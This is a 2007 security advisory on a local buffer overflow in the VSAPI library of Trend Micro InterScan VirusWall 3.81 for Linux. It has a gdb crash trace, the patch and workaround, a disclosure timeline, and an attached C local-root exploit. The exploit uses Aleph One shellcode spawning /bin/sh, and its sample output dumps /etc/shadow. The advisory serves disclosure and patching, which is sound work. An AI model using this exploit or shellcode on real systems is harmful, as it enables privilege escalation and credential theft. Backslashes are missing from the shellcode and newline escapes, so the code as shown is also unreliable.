I - TITLE Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall 3.81 for Linux II - SUMMARY Description: Local buffer overflow vulnerability in VSAPI library allows arbitrary code execution and leads to privilege escalation Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org Date: January 25th, 2007 Severity: Medium References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt III - OVERVIEW The Trend Micro VirusWall is a software solution to block viruses, spyware, spam and various other kinds of threats at the Internet gateway. More information about the product can be found online at http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm . IV - DETAILS The product "InterScan VirusWall 3.81 for Linux" ships a legacy library called "libvsapi.so" which is vulnerable to a memory corruption vulnerability. One of the applications that apparently uses this library is called "vscan" which is set suid root by default. It was discovered that this supporting program is prone to a classic buffer overflow vulnerability when a particularly long command-line argument is being passed and the application utilizes the flawed library to attempt to copy that data into a finite buffer. On a Debian 3.1 test system for instance an attacker is required to supply 1116 + 4 bytes to completely overwrite the EIP register and thus execute arbitrary code with root level privileges: # /opt/trend/ISBASE/IScan.BASE/vscan -v Virus Scanner v3.1, VSAPI v6.810-1005 Trend Micro Inc. 1996,1997 Pattern version 684 Pattern number 56446 No scan target specified!! do nothing. # gdb /opt/trend/ISBASE/IScan.BASE/vscan GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found) Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) run `perl -e 'print "A"x1116 . "B"x4'` Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print "A"x1116 . "B"x4'` (no debugging symbols found) Virus Scanner v3.1, VSAPI v6.810-1005 Trend Micro Inc. 1996,1997 Pattern version 684 Pattern number 56446 Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) info registers eax 0xffffffff -1 ecx 0x24 36 edx 0x40277560 1076327776 ebx 0xbffffa03 -1073743357 esp 0xbffff818 0xbffff818 ebp 0x41414141 0x41414141 esi 0xbffff838 -1073743816 edi 0x804f008 134541320 eip 0x42424242 0x42424242 eflags 0x287 647 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 V - ANALYSIS The severity of this vulnerability is probably "medium" as by default the vscan file is only executable by the root user as well as members of the "iscan" group which is created during the installation of the software: # ls -la /opt/trend/ISBASE/IScan.BASE/vscan -r-sr-x--- 1 root iscan 24400 2003-12-20 03:53 /opt/trend/ISBASE/IScan.BASE/vscan However administrators may potentially have changed the default permissions and thus granted all local users the privilege to execute the file. If this library is also used by other applications they may also be flawed (unchecked). VI - EXPLOIT CODE An exploit for this vulnerability is attached to this email and can also be found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a local privilege escalation: sebastian@debian31:~$ ./tmvwall381v3_exp Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) Author: Sebastian Wolfgarten, <sebastian (at) wolfgarten (dot) com [email concealed]> Date: January 3rd, 2007 Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your current user id is 5002. Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege level with id or whoami! Virus Scanner v3.1, VSAPI v8.310-1002 Trend Micro Inc. 1996,1997 Pattern number 4.155.00 sh-2.05b# id uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan) sh-2.05b# cat /etc/shadow root:***REMOVED***:13372:0:99999:7::: daemon:*:13372:0:99999:7::: bin:*:13372:0:99999:7::: sys:*:13372:0:99999:7::: sync:*:13372:0:99999:7::: games:*:13372:0:99999:7::: [...] iscan:!:13500:0:99999:7::: sebastian:***REMOVED***:13500:0:99999:7::: VII - WORKAROUND/FIX To address this problem, the vendor has released a patch called "InterScan VirusWall 3.81 for Linux Security Patch - VSAPI module" which is available at http://www.trendmicro.com/download/product.asp?productid=13&show=patch and which will replace the flawed library libvsapi.so with a newer version. Hence all users of the VirusWall product are asked to test and install this patch as soon as possible. Trend Micro also created a knowledge base article that covers the problem (see http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034124&i d=EN-1034124). Furthermore as a temporary workaround one may also simply remove the suid bit from the vscan file and thus render any attack virtually useless by executing # chmod -s /opt/trend/ISBASE/IScan.BASE/vscan The same holds true for any other (suid root) application that uses this library. VIII - DISCLOSURE TIMELINE 02. January 2007 - Notified security (at) trendmicro (dot) com [email concealed] 05. January 2007 - Vulnerability confirmed 21. January 2007 - Release of patch 25. January 2007 - Public disclosure /* Title: Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) Author: Sebastian Wolfgarten, <sebastian (at) wolfgarten (dot) com [email concealed]> Date: January 3rd, 2007 Severity: Medium Description: The product "InterScan VirusWall 3.81 for Linux" ships a library called "libvsapi.so" which is vulnerable to a memory corruption vulnerability. One of the applications that apparently uses this library is called "vscan" which is set suid root by default. It was discovered that this supporting program is prone to a classic buffer overflow vulnerability when a particularly long command-line argument is being passed and the application utilizes the flawed library to attempt to copy that data into a finite buffer. As vscan is set suid root, this leads to arbitrary code execution with root level privileges. However the severity of this vulnerability is probably "medium" as by default the vscan file is only executable by the root user as well as members of the "iscan" group which is created during the installation of the software. Example: sebastian@debian31:~$ ./tmvwall381v3_exp Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) Author: Sebastian Wolfgarten, <sebastian (at) wolfgarten (dot) com [email concealed]> Date: January 3rd, 2007 Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your current user id is 5002. Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege level with id or whoami! Virus Scanner v3.1, VSAPI v8.310-1002 Trend Micro Inc. 1996,1997 Pattern number 4.155.00 sh-2.05b# id uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan) sh-2.05b# cat /etc/shadow root:***REMOVED***:13372:0:99999:7::: daemon:*:13372:0:99999:7::: bin:*:13372:0:99999:7::: sys:*:13372:0:99999:7::: sync:*:13372:0:99999:7::: games:*:13372:0:99999:7::: man:*:13372:0:99999:7::: lp:*:13372:0:99999:7::: mail:*:13372:0:99999:7::: news:*:13372:0:99999:7::: uucp:*:13372:0:99999:7::: proxy:*:13372:0:99999:7::: www-data:*:13372:0:99999:7::: backup:*:13372:0:99999:7::: list:*:13372:0:99999:7::: irc:*:13372:0:99999:7::: gnats:*:13372:0:99999:7::: nobody:*:13372:0:99999:7::: Debian-exim:!:13372:0:99999:7::: sshd:!:13372:0:99999:7::: postfix:!:13500:0:99999:7::: mysql:!:13500:0:99999:7::: vmail:!:13500:0:99999:7::: amavis:!:13500:0:99999:7::: iscan:!:13500:0:99999:7::: sebastian:***REMOVED***:13500:0:99999:7::: Credits: Must go to Aleph One for the shellcode and mercy for bits of the code. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define NOP 0x90 #define vscan "/opt/trend/ISBASE/IScan.BASE/vscan" // Shellcode by Aleph One char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[], char **envp) { // Size of the vulnerable buffer (1116 + 4 bytes to overwrite EIP) int buff = 1120; // Address of the shellcode unsigned long addr; // Temporarily used to add nops etc. char *ptr; printf("nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)n"); printf("Author: Sebastian Wolfgarten, <sebastian (at) wolfgarten (dot) com [email concealed]>n"); printf("Date: January 3rd, 2007nn"); // Check permissions on vscan executable, if this fails exploitation is infeasible. if (access(vscan, 01) != -1) { printf("Okay, %s is executable and by the way, your current user id is %d.n",vscan,getuid()); // Allocate memory for filling the buffer if((ptr = (char *)malloc(buff)) == NULL) { printf("Error allocating memory!n"); exit(-1); } // Determine the address of the shellcode with the inline assembly above addr = get_sp(); // Add the NOP's to the buffer memset(ptr, NOP, buff); // Add the shellcode memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); // The return address *(long *)&ptr[buff - 4] = addr; // Off we go, execute the vulnerable program printf("nExecuting %s. Afterwards check your privilege level with id or whoami!n",vscan); execl(vscan, "vscan", ptr, NULL); } else { printf("Exploit failed. You seem not to have enough privileges to execute %s, sorry.n",vscan); printf("Hint: Ask your local admin to add yourself to the iscan group or let him make the vscan binary world-executable.n"); printf("Then try again :-)nn"); exit(1); } return 0; }